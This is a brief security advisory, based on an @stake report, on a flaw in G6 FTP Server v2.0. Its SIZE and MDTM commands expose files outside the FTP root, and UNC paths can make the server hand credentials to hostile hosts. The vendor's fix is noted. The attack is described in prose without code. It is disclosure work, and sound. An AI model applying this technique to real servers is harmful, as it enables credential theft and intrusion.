COMMAND
G6 ftpd
SYSTEMS AFFECTED
G6 FTP Server v2.0 [Application has been renamed to BPFTP Server v2.10]
PROBLEM
Following is based on a @stake Security Advisory by Rob Beck.
Gene6's G6 FTP Server fails to properly restrict access to files
outside of the ftp root directory, when using the 'size' and
'mdtm' ftp commands, if the 'show relative paths' option is not
set. These commands can be used to gather useful information
about the directory structure of the host system.
Many software vendors are enabling features within their products
to take advantage of networked computers and shared resources
either on a local area network (LAN) or across the Internet.
Almost all win32 applications now support the use of universal
naming convention (UNC) paths to access resources and files
between machines running Windows. Many of these application
vendors fail to take into account the security threat that arises
should their features be misused or their safeguards circumvented.
An attacker, through the use of 'trivial' exploits, may be able to
elevate the threat level of an attack by using features in Windows
applications or service software that allow an UNC path to be
supplied. By incorporating remote share paths into their attack
methods, attackers may have the ability to force a server into
creating an out-bound connection to hostile servers. When an
attempt is made to access the remote resources, the hostile
servers would be able to capture the victim computer's
credentials. These credentials could then be used for a more
critical attack on the host system.
SOLUTION
The vendor was very responsive and has made a fixed version of the
software available within a week of being notified of the issues.
A new fixed version of the software is available, BPFTP Server
v2.10 (note the software name change). It can be downloaded from:
http://www.bpftpserver.com/download.html